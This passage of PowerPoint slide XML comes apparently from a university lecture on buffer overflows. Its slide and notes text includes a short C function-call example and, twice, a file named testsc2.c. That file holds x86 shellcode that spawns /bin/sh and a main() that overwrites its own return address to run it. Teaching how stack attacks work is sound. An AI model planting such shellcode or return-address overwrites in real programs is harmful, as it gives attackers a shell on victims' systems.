                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    x = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    function(1,2,3);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    x = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>("%d\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>n",x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="700" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54276" name="投影片編號版面配置區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3A42608E-F9B3-4696-9A05-A2BA950BAF74}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>15</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HK" sz="1200" b="1" u="sng" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>testsc2.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" u="sng" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>char shellcode[] =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>\x80\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>\x89\xd8\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	"\x80\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xdc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>void main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> *ret;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    ret = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> *)&amp;ret + 2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    (*ret) = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)shellcode;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5530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D28B1F-95C6-4567-BD16-25363BBC25CA}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>16</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投影片圖像版面配置區 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="備忘稿版面配置區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HK" sz="1200" b="1" u="sng" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>testsc2.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" u="sng" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>char shellcode[] =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>\x80\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>\x89\xd8\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	"\x80\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xdc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
